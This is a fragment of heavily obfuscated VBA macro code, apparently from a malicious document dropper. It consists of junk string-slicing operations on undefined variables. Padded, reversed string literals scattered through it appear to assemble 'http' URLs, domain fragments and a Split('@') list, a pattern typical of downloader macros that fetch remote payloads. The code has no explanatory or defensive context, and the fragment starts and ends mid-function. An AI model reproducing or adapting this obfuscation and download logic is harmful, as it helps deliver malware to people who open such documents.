vbFilt(1) = MidB(paEhqGNU + zOHujXdOtTDaXkkvCsQdAaTIKasKNC + IjONHWAhO, 165, 288) + MidB(aGLLbEmTlG + OSoBJpXhQEholuHvPQokTjzmz + XZtzsDLfETrVDc, 35, 582) + Left(KiYVOJAahUUKC + RainqsqvPKZulISCcZbBLkzSVrLuQR + BWqfwTiILopG, 781) + Left(SiGmEpZ + tZUEEQJBzHvLTqTqWuqdwosMJi + cDnmYwiDvfmEoS, 141)
   Dim WkDblj(2)
WkDblj(0) = MidB(PFNGSSZH + zjmBGncIvcwnHhulizVsTor + lfZJRqkppV, 583, 309) + Mid(ltDSSGYYzRW + bqSMOkHXPCfwXrEzdVkzQVZwwNjI + VIwWIPfr, 99, 415) + MidB(mVijTBo + wrrCrpoKKjJVbPthpNROIKiDNPtiUmm + HURaqjumw, 932, 334) + Left(nlMaLfhci + lavQEZXiwmNXnWcLNRJub + tbHpoYbIp, 313)
WkDblj(1) = MidB(iXZiqVBXonM + AXfrbjTIfvbPJNmiatuooiSZakdGP + oAwRNkRVwrd, 148, 520) + Right(lZpdtRFirIIGt + ZjmlVMpzwIYwwKbmzEQluMiS + EdYznSzU, 807)
pVLEBL = "\+/^_^-j_/\N^" + "-\/T/_^-" + "$" + "^_^-/^+" + "^_/" + "^\'^\_/\_" + "\-^'_-" + "^\+^-^\" + "_c\_-^i_^" + "\/^l_" + "^-^" + "\^b_/^-" + "^u^\-/p^_^"
Dim ijCPM(2)
ijCPM(0) = MidB(RGcOUHpivtzo + zhHVjUGWzdNtjAwVtVuIpibuQLaEO + jwuudLiv, 147, 186) + Right(NFdwGDSt + ZSmHZpKNOjnDCQKPamwEcOpmNU + kMdZcHVloljvXX, 504) + MidB(vNnIiUQaNKt + zDMRwaaalvYaoDEnnLRHNoFrMw + bBmofjFZzbzVbr, 679, 82) + Mid(XfGFwqfv + tjNiLnUXoAXcfoLNwEBMzbjrVEv + kbfQNTJnXMPi, 788, 74)
ijCPM(1) = Mid(RkciPcYrWOC + wStrojBzYzunswlhKXfPETUHCntzQhqYt + AUCbsnivXijGp, 67, 600) + Left(uwaRUbwLfzdF + wPuJDdoLjjwdWhDwlivvVjsDQ + EpVEhrvtcTsjR, 825) + Right(wbdbBsVrvD + dKZXzripaYqHCJRRvdJucmlnMUiJdX + RtUlaMzwZ, 733) + Right(wiEZzZOpTQ + LDSVwPLSkmrYJDslMUqziPEJEJhwBvjZW + AKaUiMqjdqW, 419)
   Dim TNWjw(1)
TNWjw(0) = MidB(vYQMDzY + irYKZUMurHmpiaAKZZtGijcaN + fNqknPibiwBHo, 112, 24) + MidB(ujadwOni + uazuwYDLuvEqDwSMYScTVjiQO + CGCinBkECikuGU, 54, 65)
WhAjObk = "\/:" + "^" + "-/" + "_" + "v^\^-_n^-^\" + "/e^\/-^" + "$/\^_^=^_/\^" + "X_\-^W" + "^\/" + "_^b-_/^$\^" + "-/^;\^" + "_-" + "'/^\_4-"
Dim LpBfzh(1)
LpBfzh(0) = Right(JJamWFrwF + sMnqNjNUCUiVPbfouGJzqRGTWwWuRSMuWXz + jMUzfnLvuZDEwE, 820) + MidB(sYGQrWjZMCDwE + GKanWZQiuXbYSSNVthfahpoXSkIzqSNzni + PbuMsQwNjtp, 650, 61) + MidB(PYfhziBztlY + FsfiRORfUnbqYvawSqwZIzFwN + bUfsIqO, 117, 309) + MidB(XjDsFHH + wKcSPGTWlMDaftSwzKpKHMSPV + woAEBQrMcBXrU, 74, 448)
   Dim HltOnF(1)
HltOnF(0) = MidB(HJDpqcM + wIMKPfjcnjbTndqGnwjXIETKfX + QGpWvuk, 851, 125) + MidB(AVQnZWZzjpOD + lDGvUDFnjLMsQvVvrVWFRuoGYQOBDRiKq + mHjNpFahFsDOtX, 644, 41)
qRSSV = "/\2" + "_^-^\1^-^\^" + "_^'-" + "/^_^ _" + "\/^=^-/" + "_^ \^"
Dim AkkaG(1)
AkkaG(0) = Right(djIGhzOBYWR + lSwloOGBAMNBfTdSYdssHALIGZSREiTiho + rXZcXuECdjXF, 967) + Mid(CivDlcG + ivJTLlApTlmSfzzwIBNSRiQElkN + XzubkkqsjimM, 18, 679)
   Dim JZJJo(1)
JZJJo(0) = MidB(JAVFzqzGu + DVddbkVQaSVjKUMMpAkpsQWGiLal + uzcZjzYnXpwot, 718, 907) + Right(lOMYcSflNEd + zjvQpLrftJBcvtlLBhoWMRSj + SsvwSpQscwjlr, 104) + MidB(XzXmhqT + XLJizXiuwNANEFcLuoqjBJtSJKG + dHviGJcYFq, 866, 844) + MidB(SpRJWwiqZhbHZ + UkslbkzaVBSPWrhTbcrAjfuniNC + WUkGAGsFVaqo, 414, 574)
   Dim wFoUca(2)
wFoUca(0) = Mid(cspvhOEFcB + lXMLSltSbGvjFpiYzWZzsvvL + jkzmONYtdBq, 643, 159) + Left(cuPbZajmsz + YUQWabouQIRrQlSPOfdPAjjsDAz + PBAYMfQGTzzMm, 957) + MidB(okzZjlhu + qqiluZIUBQMiICJufOizkOPz + iUGUwoZ, 456, 658) + Left(DRwtscCqWaq + ABIrwWfbaXWJslUMaDAzmFsmMGL + SpTvfhZMZwdAZ, 444)
wFoUca(1) = MidB(QWtodaMADWlF + UOmiDTYqoMABFXwNiwkSpKrd + JvTcHiONqTOKa, 662, 942) + MidB(ZHdHJDwjWkv + LqGwiAsYtajWPurVNhSWpk + XvluSQRHYEcDw, 681, 103) + Right(VXmnBpziajrt + NiHVcIjpSIWmuwbmpUMNEVGlL + aNEnOYoOcWAf, 102) + MidB(iCFkBFPHiwA + zWXUwliSzfZkQzPHjYqDfbrbKGZr + lOGwjiTC, 714, 246)
OwmdKGpd = "_" + "-^j-^_^\" + "N\/^_T^_" + "/^-$/\" + "^-^;_/-)_\" + "/'/^_" + "-"
Dim qXRmlB(1)
qXRmlB(0) = Mid(jCEcFqhZ + ZNIfAiMSzcoSuTfYPwDHQMZ + iUBtncL, 312, 678) + MidB(iZUiPjsjKw + CBnJWFrTbkmwwiANlJIppbVsjUp + uzwrATpK, 834, 832)
   Dim RpQrq(1)
RpQrq(0) = MidB(kiISssFKUosHR + BsQIGnindAFQamPjiUXGFndJhwTvItSnXah + GriRnbi, 457, 510) + Mid(YzusvEKU + wqKFwXIwVoBOROaWTLHYKWKwarTPMY + BUMqDWZE, 691, 158) + Right(ddVirIfspSzj + hGCZoInHNFcIbMCibVwWkY + iUiUdEfoSBKTi, 923) + Left(PYOADjmiz + ClkRAkPFiljYdmuAviAjHMKDpBhE + scDijKiTqi, 723)
   Dim ThjQzs(1)
ThjQzs(0) = Left(lwMuLzhANIz + zsAAqzWtDuSMrWlbmcvNVvjCmowjs + UpiQGsX, 653) + MidB(uhUbnPm + pidwQvKwkELZCoBKfjYfnr + LbwZKNVUTq, 855, 362)
QCUzPYnp = "^@\/-^" + "'/_\(^-/_" + "t" + "_\/i^" + "-" + "/^\^l-_/" + "p_/^-S-^_/^.^" + "\/-'/^\^" + "_R^_^" + "\-/^\-/m/" + "^_-o_^-/c-^_/"
Dim jUkXwY(2)
jUkXwY(0) = Mid(QJimKQKiAoUX + QEdwvKzcpzFIPMITkIIPGfCOFu + ERvDjuwcUmn, 380, 635) + Left(AwSsVkP + LoWSswripXBqKjOUHoliadCRnBf + uJsrXfkXvEiKi, 206)
jUkXwY(1) = MidB(liAcbAXZGwpq + jJjMvKSqpXQbJHYVfBXiNNul + aqtrqXUdSOVT, 950, 754) + Mid(KZOSiAV + CJfSwBZCQwdZmudEALDkTICU + DaUZrnOpKTNwTu, 446, 239) + MidB(pcjnXRUowZLK + BAzpiEhwXzkJErJNHhRfQDDFCppdA + uTvhiXDsEjC, 266, 510) + Right(pMEciBGhjmbzfH + jlKKYNfZKmqkNpczcZXtin + vHXYlWQS, 540)
   Dim ndbtUi(2)
ndbtUi(0) = MidB(jMbqnRDqFa + VlfvzEiULLjpjoBLwVsjCiWhCQAns + ZBwfvQvKOXdmHw, 635, 29) + MidB(EfTTWTNa + EKYrsmOjDfCEVnsjwPjVjnQdGifSUt + DwmtVjz, 953, 993)
ndbtUi(1) = MidB(izfijQL + ppsDbIIEMiLiPkCuzXRVcnijbAvB + DRNFiSM, 533, 864) + Right(VoziukmORooXU + tcjEdKYFfWnOjhXiszizjPIn + OttpTYkuo, 908)
McKtN = "._\-p\^_^-^i" + "^\^-/y^-" + "/_o^" + "_/\^d^\/^_^a-" + "^_/c-/\r^\-_"
Dim YqNcv(2)
YqNcv(0) = Mid(jpzibvTZaiKMh + OrwTXzSzGQIcWcnlvWLnzGItbXr + LVcWdcao, 267, 806) + Left(LnqCzuLbvwf + ANPFqcIDzGuGKwhjLLmTRq + fVQOqaScOKj, 455) + Mid(SHpkIrjoQwPzq + twOLzcnniToiHANTtidhintq + zrjZNUMVL, 279, 292) + MidB(HToCBhQlFj + kQRjYFliViZkOUnszEEOJtkrJojuKM + EvpnIdwzZtE, 774, 644)
YqNcv(1) = Mid(sHbSjavDmoO + ooOYnqisDKvbSwTowJomjtrDIr + uBDKlifBqLkpzf, 834, 340) + MidB(jwsEMhABffvnZB + BaPzKoJvDbwpDBJHEHpoVKjzAFC + pliRCPouowlI, 102, 42) + Right(dWAQtwELltp + IqQStJDZkXXUNKEfQIYiCVpshSfJa + jGUqMtH, 35) + Left(cvjhuHGchCRlHN + QWHFNzGiDjoEWijaZJLnK + tLouzHuJclun, 726)
   Dim bjfSQ(1)
bjfSQ(0) = Right(zVzwJZHFt + fXnBkSmpATUuNkhXwuPWoqwIOwiQW + khlawNjbOwdb, 688) + Left(rjJwGQPAwK + XqWDzndcwzzhZZLPOWqG + XATUjmQK, 67) + Left(rtfnGJVvmJRh + bmuXmhjcwnKHWJjQQJffbINULH + SEGFAVnQ, 512) + Right(zGAvBzlGV + wEvGSOZNYzSUFBQBNqPtiZb + VZBbTCGB, 193)
   Dim YwqYSY(2)
YwqYSY(0) = Right(uHXnXtEjzjjE + oDcuvmfcqvklNwmGItnbTWPYBzH + tEKnvXcfHS, 319) + Left(nIrnKZXdXZAbI + OdfjsVqjDIqfvRbXCbjNmhhwWf + mAwRdnhh, 439)
YwqYSY(1) = MidB(oiUqrhFwdZh + hQsBKYTBtzijiooElfsjSrqOR + lEKYjNujXzd, 506, 899) + Right(HIDRJnFdD + jaJUKCUNLwXKvuJzGIFzjhLzXsj + itjTWCna, 113) + Right(RjzHpPiHXv + iYamwDzUfXQjBamuSizPjkDKHOYDMqCBuwQ + INqtTRGuor, 262) + Mid(pcwoaCvsp + TEqzufqdKqCqqjSSWKzwAZCG + tiSGjZPbG, 2, 174)
ppumi = "e^_-/^m\/^-" + "r\_/e^-_/p\" + "/^_u-\/^" + "s^-_^" + "\/^\_-//^" + "-^_:_/^" + "\p^-/_t\" + "/^-^" + "t^_^" + "-/h/^\^_^@\^" + "_^-^t/\^_C^" + "_^\/V/" + "^_^"
Dim zpWHUH(1)
zpWHUH(0) = Left(QvqDaHW + jvFqwCqFhNGjRujQHLrZMwrqFnWd + nmkLswnjBntm, 164) + MidB(vWJAKiJOVss + kSKkvKtiUYIYLjapHMKQNcAI + PTzqbvjcIq, 959, 816)
   Dim NSdMO(2)
NSdMO(0) = MidB(ccTHTUvwFcO + AMELRIpIdDcuqqGHXjIlDAzWqGiVnF + BNRvFHSwZr, 244, 238) + MidB(qwEnXzs + LRmwCvhoBRpsqcVKLLnnslPk + iIjZMFi, 375, 172)
NSdMO(1) = MidB(sCXLMQw + SrhiQpYitNmQoGslkwBXAHSJPcj + cohrbwJWh, 988, 495) + MidB(qcORSbASWiQ + azjICNsWjcGPmGJDwbQqvzJFUwFJ + uXLpZwMCGH, 997, 147) + MidB(ouITjos + GlKsHYYdprWOuUPZQJqnv + apmdcilOF, 79, 283) + MidB(didhRKi + opiZStAPzPjqwipNNlApQPvhfJVkir + wwDMsNp, 119, 989)
   Dim CwZHzu(2)
CwZHzu(0) = Mid(dXjvUFpZrZVPkj + GRQrqPJVbYwCAuaivBvFJlhIjfUpWadB + sHNNNUvInYw, 296, 899) + Mid(icZSLHFJHZqGi + XtdwmooiITJwILUkrzDiUWm + nXNMiLB, 64, 727)
CwZHzu(1) = Right(AquQzCGGAvFGXh + ULJazqhulFwnHIimkDmiSPfz + QpizhjscXwJJ, 1) + Right(FoTsnWTnjjahcq + tXMUPRTGaQOlrrDNbMEXLwCwPGzP + iQlnKdnVN, 349) + Left(FBpsXZndj + zAXNTDzbAUBHbPzKZFAurAIXiabIiW + nmQTRNrWwEuN, 746) + MidB(cDdICzFjMLf + ZLXkzTcuGomvnGukazwEBOZmhF + mwqzkjJO, 374, 609)
   Dim BlrlSt(2)
BlrlSt(0) = Right(SCAwaBzHvCPGv + SwQjCXjrQNPblPplBzqdVifBvva + zNZoCMhRjLjlA, 724) + Right(fNiRVAabTu + WnwpTjPOMaYHISmGrJfPhwbUzmzUIPJ + OuRRVHJFbGKMio, 406)
BlrlSt(1) = MidB(AOqXOtsPQb + dJzMWXMDbBVKGqQzcsiOvE + BZBEjuw, 952, 945) + MidB(MRIBWZMVMICbHz + NvuBIwXLBBWVLItDIEjLojjLswzuFCHl + MrOtzAU, 70, 835) + MidB(zJYwvwT + GSYmfNDHRSTaqqQqnrlrpKsoYvJFoP + uTbOjwNmYaasTh, 657, 95) + Left(isVaibmYiLHNfK + wzOYmuiwSPkAVqEwrlabAbLRBfLvPEYl + kKkNWHTrmCnwC, 328)
WuulsihowWS = "-^0^-/^\" + "V/-^_^Q^" + "_/^\//" + "_^\^s^-^_^" + "\^e_/\^d^\-" + "/" + "^u^\" + "_/^l^_" + "/-c_^-\n\/-i" + "_/-/_/^\n^"
Dim TjwuHd(1)
TjwuHd(0) = Mid(LaGKBtjFZUnzdp + SWwRWbTmcTCWZWqzoATt + MdrDPPdtrbkj, 867, 454) + Mid(jXYZjjAY + mswEzdijKzbWNqIizcSNhUvVoDc + VnckuncHw, 236, 248) + Mid(KAKjXFCNJAUf + DHtchUIAjlFOVEaQFaAJFjXaGMmH + DZzEjiRYKQZ, 572, 186) + Left(IijOFRaHzowK + nwiBkmwWhaJclbWItziDtzM + BQmUXVWTv, 544)
   Dim AmsEzs(1)
AmsEzs(0) = Right(XajOWLUF + FzXhvqKAtmzPdzQhRnlSPdWSo + tkdUONHTqBuw, 992) + Left(NKDRGibo + ThHDZYVKMtPjujINCPWjEPLOXjBSvSd + zPRdYlmswhP, 790) + Left(QYYoBhBDoNJzbK + NRTCIwkmwznIhwlltXibNfwbETa + RcUzVipSomp, 946) + Mid(uGRkHqZiv + FXLWjSYtWWfNwLvSEliRBVmjSTCij + PGdvITRD, 227, 835)
   Dim kDMCnv(2)
kDMCnv(0) = Mid(cMMaBAEJtlC + iDFuGlGcqzzjIBFDXCopDM + RMaKaATFzG, 145, 643) + Right(wRWNcUrKrsfw + qNCinOpQjYzNCuLtoDXTpjwfG + ibwMPmDZuvti, 618)
kDMCnv(1) = MidB(iHoQjwIFMDSuM + jivCCzzBnIHUdvUrdAFqqkWVmIwrqaFMKn + rfGBIYdiHQibQ, 234, 867) + Left(sGSfbMsqQQtYl + NpJZkohPGrNVUbihHSKHPSNLrHjGW + OaCTNEK, 826)
ZDKJjJSQt = "\^_^-i_\/m^\" + "^_-" + "^d/-^\^a/-_^-" + "/^_^-^p-\/^" + "w^-"
Dim rTVpm(1)
rTVpm(0) = MidB(STBDhtHXd + WlrqYGAbtOHpwTtpCVXpDMzKs + pbUipDWB, 892, 290) + Mid(zXELLEOr + oomwwndZvHSDmnGIazaMKaRzAnF + jLnfvrGiX, 412, 368) + Left(vTRYFwzLFiNbc + odlqcBUrzHKJzCdHfzhciJjFbhZE + ctukdFqab, 357) + Mid(foOCAGvIujHACj + tKZCqwhDItiadDOLndsqSILYvmthwJuh + ODhGLuGcVfqLs, 805, 282)
QkWQlTjiQ = "^\//" + "/\-^m/-^" + "_^o\-/c/^\^_" + "^." + "-" + "^\/r_^\-e^" + "\-^_^m^_/^\" + "^a\/-g/_-" + "^i" + "\/^_^t\/^_^l-" + "\^_u^-" + "/_^.^\-/w^_^\"
NqDvA = EJDSEQiSNQb + pncfwkQ + pVLEBL + WhAjObk + qRSSV + OwmdKGpd + QCUzPYnp + McKtN + ppumi + WuulsihowWS + ZDKJjJSQt + QkWQlTjiQ
   Dim VdGtf(2)
VdGtf(0) = Left(QOMhQiVEVwkw + daqmfiktDTtpLolUVufuuEwU + tiGRZrDQGz, 828) + Left(LsoKtKQkbL + lzfviiNdWompPTOYRTWUBGuD + mRSTAotXVYRdY, 11) + Right(CVdqfPN + zOddpofCmjVTpbZMzpvWSzDYZULXEfw + QujklblQJi, 679) + Left(QSPXjjB + jlPFibMnWmBJSTFVFIOUsXEs + zNAhFNuUftJE, 430)
VdGtf(1) = MidB(uAGzwSKX + CSRXiiiDGqJlEFYkpSmVHwXzs + opJvDvdzz, 292, 510) + MidB(CDIfBuXiV + kPwJZKjqrrBUbBJumrDWSEprvw + TkTKnwUXmik, 180, 472)
End Function
Function KdLivVuriTI()
Dim WXYGM(2)
WXYGM(0) = MidB(fiwFTBShhMhGfu + EVBEvpismiwdWBzdQGMKuEbGGEPFT + UkLQwpAE, 384, 856) + MidB(DKKhdOFzJr + zUjbnWVqVCRoNQBsSbjXvvWmqOG + ZFRdGZQzWEi, 653, 152)
WXYGM(1) = Mid(PwGjHwsiPznfQj + jXZrjvpsqlvvXEoBdWuIXqaBfStzOsEvK + KTHNsWD, 951, 143) + Left(zdnMkrMh + IuJazljDJfFzSCiTaiTqXSPMBHNj + qBZznvlWupBc, 877)
   Dim ZBqEHq(2)
ZBqEHq(0) = MidB(hTovqNtcNLJiw + fVhinphZGbFbTsQsiaAjfFa + sQHfNsLia, 166, 266) + Mid(tzoOHSI + QwshhimBcNwThbwriHJqjRjCuRwIiswzJ + LjwYfABhLWp, 352, 300)
ZBqEHq(1) = Right(LFjjoDA + kiEQbkbpILXaNERCwVjiZhjrSczcKFEoB + FauAJDLawncP, 729) + MidB(vnlwfiusJNJ + VIdDUQqulpiNGiMNViJRCERCLhl + TwEqKZv, 413, 310)
   Dim ZTPqO(2)
ZTPqO(0) = MidB(XkJzinIZa + IEfrvCaOqOcKLMMFCNYCmKwjkivOnP + rUiYMPz, 501, 6) + MidB(woSbDWM + kBtjwTqjvAoTrUsWdAwCqIAuRDrrbl + paBbtZPizG, 669, 140)
ZTPqO(1) = MidB(jjsMuIlzDYwYYj + NhQniRVBKUTCkNTULwOrSiqXdf + jbrtBrt, 373, 329) + Left(FkoRzSwDKELrJ + zEousWmJksLqYUADAIiQsEfcKw + huMtofWSUTaE, 485)
   Dim HAlcvd(1)
HAlcvd(0) = MidB(ktdEkTlrC + jINNKaPFUprzVIkvMLiDauUPnTzsGNS + tmaCjXhatv, 219, 675) + Mid(qfrasBFnTpLb + zkkAWkrImJSBdjzMkHNPmZzSFS + ElJcIKKMqrhsh, 421, 507) + Mid(GUjfOBPkVwa + lpBSzjrAXwTVsZUiQqwwELqktsnMknY + rOWuIbjfhLtJq, 302, 745) + Right(acmqwGJvzIj + jzmhcTuFpPTXAwbBfIMwTAvHMw + zDSivXInTm, 433)
   Dim JzwhO(2)
JzwhO(0) = MidB(pDlHhYfvEaC + QdpHjhEopuZlrsKNRNMWMf + rwkaaaUE, 623, 155) + Left(jQoLNqivhmloYo + EHdcVUMquPUwRnCbDhBIVzSfEM + lYYzZiM, 551) + MidB(wRwWjit + MVHAXCwIiDpIwMiatnmaVzZkJwOn + cihiYAzaWhZ, 433, 914) + Left(loJlGoMzu + zSoJQPEAPfEBsqjBwCERY + CioQlmr, 429)
JzwhO(1) = Left(lMRKSQUDFjI + dLQsnAtAQMMZqkitMLZoPqflkOSawJ + FUtDWJiV, 256) + Left(takZMWdCFDXBBH + mwYPCKifzIIjjKtmKApFDTHJ + SsvGArWopvjv, 98) + Mid(OUWYzwqIV + zsUvvBXzHNBfphmUOvarpzk + lcjaCsti, 387, 890) + MidB(YHXGBSqiRKVK + NXAiwKQOLPXmzvDRazVpnohuBqbGYIMiW + wpRJvHiOSDnOs, 913, 250)
YwZaFBCi = "-" + "^w/^\^_w-/" + "^\" + "/_^" + "-^\/\_^-^:" + "/^\^_p-" + "\/^t/"
Dim LDiMz(2)
LDiMz(0) = Left(nNdkEiZ + BklbnKPGqBWnAUbKaUzsfzuqjMrCR + rEBiPAn, 536) + Left(NOmCIItEFzKCrF + TjuzzEiASQacKIDczSjYDzzMLppMvEWj + XvIklksiQtmo, 148)
LDiMz(1) = Left(nuljLqBCsSLcDi + mEVFBJzWDfVhEXhQSIKtrWtPRa + EsEzkmTsduOcf, 410) + Right(SudMkVMDlKdjIt + vqQoAanvzZiPWYWCvzXwijANZIj + NShoEfzsHiPK, 834)
   Dim zowqf(1)
zowqf(0) = MidB(VNTPdWsCjtHIPN + COaSpNBMEVcmwRJJruDpqTnXcjLXJJ + cFJHIMHKkBPPkc, 964, 978) + MidB(zSwYkwBqZcsUMT + pEAjMcnFpEXnzlNKJzDVKFRn + PovEjmtwn, 641, 452)
   Dim wRScMo(2)
wRScMo(0) = Right(vOjLqaw + fMARoLOBrPRsFsAiGawtRlEFPtzjbrH + IRHGDaUuDk, 72) + Right(LHTLEnhTijkFz + KoZkUUsRzjvzdOBAvZirQUDFZkXAERcjPK + WSqUiInDTUijK, 495) + Left(uYmPROS + jrhBPzqhGDPvlijzFnqirbp + DXIAJswRFB, 95) + MidB(BDWLzwmHjRcNb + MqaZISijvOsDnawhjRIjcrEQUFfnhD + PbfNWXU, 523, 930)
wRScMo(1) = Right(wvITvdJCDEJwhD + dPbKziHLBWvOSjzFVLmkKYBF + dzJVNqL, 406) + Right(UnzwtGOnkXackz + riRmwYHFtDNZAbOZCliODJOUcfANLpPzh + wvjrCqto, 743)
   Dim NwHhMw(1)
NwHhMw(0) = MidB(zmiIzNNnNquCEq + WwFPOjtqjzdABWniBVXzfuvB + ucXWqLOrulStrY, 613, 258) + MidB(LTGzmIYvwBaV + YtorcHJqIwIPHdwRRKBqvqOwuMMRZSn + kolccVKKqFtQSz, 691, 163) + MidB(oXDsANJP + fiObmfOcjifVqjlVhcNPIwwuroX + rOiIrRdml, 141, 534) + MidB(TjXoPrbnQTW + cnkWoJOdcBwuEbVjnifSXDZfsa + HploqBOSSNLpEV, 830, 401)
SikwXPSishz = "_^-^t-^\/^h" + "_" + "^-^\@-^\" + "^_" + "^d^_/-^l^_\" + "^-p" + "_/-a^-^\/G"
Dim ulPZiQ(1)
ulPZiQ(0) = MidB(GmGLfYunwJS + QWqAUNhJwPRGXVsiQccHIpnkKjWFiW + PZYOCZVKXpF, 150, 724) + MidB(OtqvkHOWLjdWda + kmIFSJBaDmzkjfwlkIMAWACNiZCskN + UdTcFrQrwK, 584, 861) + Right(iksRzqI + FQvTAAuNXXOKSHDUbjWJljuRzS + MirOMJXPq, 68) + Mid(UNqISkOc + kZiGKmFjvvIBciEwMswQPoXqlzODm + wSfFwlJHIBzM, 221, 276)
   Dim uuiCZ(1)
uuiCZ(0) = MidB(UwJCDljqduo + pAITEMrOMimrkaQbONvsmCfBKHJmiVf + lLwMzQIOWXMBJZ, 47, 606) + Right(muIWQYLhHC + ILHffQQnWndPABiHHHzsj + uZASJFTSO, 22)
   Dim pUjCh(1)
pUjCh(0) = Left(TSmwTjjr + PiLYpvLCqPPcMbHjGzFMJMnLo + cJiDwkTpzY, 392) + MidB(vtDpaUMwHHOKJR + CjWMMOFlQrnvZKIQQIzlUcZUBPsm + dwpzmkhoR, 335, 196) + Left(DhzcNBAmDF + jntDWfdXRcVoKbrfbrEVmEmfl + arquDznkvlj, 60) + Right(FcoCdRKLZXLf + zkzsIsrluHavrwuCjhcwdIAUORTj + hlLlouJuUzu, 894)
VBNnYJUfnMX = "\/-^w/" + "\-a/\^-S/^\^" + "-" + "//\^-m^-/_" + "^o_"
Dim hqLVU(1)
hqLVU(0) = Mid(wphtbjFjZUC + MiizWiMFljzSVlWwMqaopFYdJwiLF + DDIOwpFmqEAuIN, 389, 261) + Mid(EXLlpsrwBC + ZaQVSiNZAIHjkpKQltpBLlRNQWAnC + iZdmumzLV, 910, 302) + Mid(EChimNH + ZEkBUzDzVFKUQhdUDUGwdPINpRBom + AYBtRCHVZKzhwm, 988, 94) + MidB(WzPTIHlL + iUQXmMPIcliawjlfbpMjdQii + uHFTtnFuZ, 912, 744)
   Dim PfcWd(1)
PfcWd(0) = Left(XlWkHXcTLK + OGlIGtsoNiEiFizlrMtOZPEmmSA + JIGMiXVdktLs, 644) + MidB(cVdhUwqvHrL + GGWMsUYYpUOVjIFrbZKQpSRlT + USiTWiXwzMPiEf, 162, 368)
   Dim cqZnZR(2)
cqZnZR(0) = MidB(bDBHYVkmHD + siTfPhLarGmXzktEcutSEELUR + RsEnztWu, 460, 842) + Left(fVQiCZlr + tUozPObENtFouSSBqWRGiNznZ + jdZmwkzziISTiM, 113) + Left(WMkYuUXacOFm + BvSMcKBwiSDOrkntQRNYWmJBL + tLLhRYLAdl, 606) + Mid(RUiGfppUcTC + WwaTIpaMZrAhabtzhkHBDCWWhBQsJY + PaKcpzR, 850, 552)
cqZnZR(1) = Right(FdNadmRQFP + QmTtKIzrIwLToEuOYWdQtTan + HWmUDtqWGGkdq, 315) + Left(CHohWYoAV + VaZkUtzBbZrPOYlKivjNQTzYUjhlwDH + jWPjqPfsLrtTwm, 584)
tIwAUz = "^\/c^\^-/" + ".\^_/d_/\" + "^e_-\^" + "t^\/^-^i/_^\^" + "m^-/_^i^_" + "-/l/_^-s^-/_k"
Dim UzJwM(1)
UzJwM(0) = Mid(BbazwprArIPDZ + hntFYOMtQSpjAistMYzopaAPtAr + MNSWFGsdphFii, 994, 162) + Right(PaKjjihwD + zSsdpdcViHhAQWquGLPflQPJcfkYBaU + pbsAWmRGct, 202)
   Dim ZLzIQ(1)
ZLzIQ(0) = Left(iSunsLntcF + MpwiiFbFFwDPYkhXFtNLwlESfFZWh + NdbhQCo, 303) + MidB(VqXUbFlf + VwiBtdnwAfzPJLGGbRizCbujwEz + AJkOzZnmPsPkJ, 122, 578)
jwtol = "_^\/o/_^\" + "^o^\^" + "-/^b^-\" + "/^m-_/^u\/" + "^_r\/^_t/^-^_"
Dim fczpBd(2)
fczpBd(0) = MidB(mjfVonRkbjSl + HjFSbzdYiFtqzQSHmOBv + lWAVDMaWV, 408, 358) + MidB(CUIOiAPvzSZW + ilwFlAAccCwRfXUWjPmdzSupWnDb + MwkZPhjiLrjM, 734, 663) + Mid(cojAmkrIwm + iCZBCMFivNLmwEujMFzLOuzzcFc + qYDJSiJZdBl, 643, 516) + Right(ojwKKFiEj + GDOcdKSkNuucTdEMdoalJwJRSX + XSHXFLAYbP, 818)
fczpBd(1) = Left(ulUrjwvAUNWjRF + tzMJtXcUvXhjlOzamPZlZQTCElroGUD + ipFWIzwJD, 263) + MidB(wZGfqVfTNnta + iEjpNcDwTksBpdcVCGMlIQwYOCr + ClQsaNArfAF, 411, 969) + Left(qqlRqbARWS + OEowboBpQYBHCHoFGSfiYRZFE + uZzolnqEih, 942) + Right(RFjJoTL + DQHjWQiCinwiLCTQUciNKbQT + QkqHdWjhC, 328)
   Dim mssEfk(2)
mssEfk(0) = MidB(NaUAqzjl + mzBSNKDFwZIFtPmzjptkhOSjWwT + midNrTihBZmNz, 804, 403) + Left(DzCckqsPTEui + iCRlaPCvBbUQHXiEksTUOBokzXPjC + HKhEuLjIV, 20) + Mid(ZlskjwZwR + CkliEXORZBAABTDsBTOkPzEmindXzwb + IhikGjbPYl, 615, 685) + MidB(juhNPozWfAljiw + DlWzuLXqknVqOYDwcPiMqUmCdzaEi + huNMzVWiWf, 26, 568)
mssEfk(1) = MidB(ciJlzBnVY + HJuzPfIkVhdJubFhMhplBRRTij + WhirMciG, 993, 865) + MidB(jwszqYvG + qnBXsiwLdBmVHbDPdwwwvCCYRcGobC + upojzInPrYOrj, 469, 763) + MidB(HDJuoGVqJ + XMKSbRjNatwzjGXoKptoUwVvGjTtqb + iNvQRraiYJGPO, 652, 673) + Left(UnuarqUFWai + IWpnbKsXBONwKrGAmNVnKSnWb + RwbYAkaaFYnkzm, 606)
   Dim bwzUG(1)
bwzUG(0) = Left(hqYzNKoUCwHFzz + MzpApSmNCcAjNqVAaslczpBjk + cbqhnWRm, 88) + Left(Kwphnlp + cXzLZbVrKnlBrvAJCZqUlWhom + QriJiEi, 597)
uMdkzorn = "c^_\" + "/e\/_p^\^-" + "/s_^\/" + "/^" + "-\_" + "/^-^\^_^:" + "-\^_^p^_^\/" + "^t-^\^_^" + "t^" + "-_/^h-^_/^" + "@\^_^-z-\" + "_" + "G^\"
KdLivVuriTI = YwZaFBCi + SikwXPSishz + VBNnYJUfnMX + tIwAUz + jwtol + uMdkzorn
   Dim OpMUf(1)
OpMUf(0) = MidB(EkwXSwzkuuvO + IEfMabTKsnPEzTwAzDFQjwQU + bMaHNFkjI, 98, 418) + MidB(zGkDsARwajOdHD + QJHlwJfMIrriPLijJFKYTQPBjMdFBwhr + dzqaYuAJj, 669, 287)
   Dim ZbQdC(2)
ZbQdC(0) = MidB(ujdiPmh + LosmibIuWJJqWNSiOEHTojsiYhb + wCSqPZSzStj, 622, 680) + MidB(KzoCUDX + VDCptkpihNoDozjvKYnFopXYtY + YDOUMXdEiD, 305, 44)
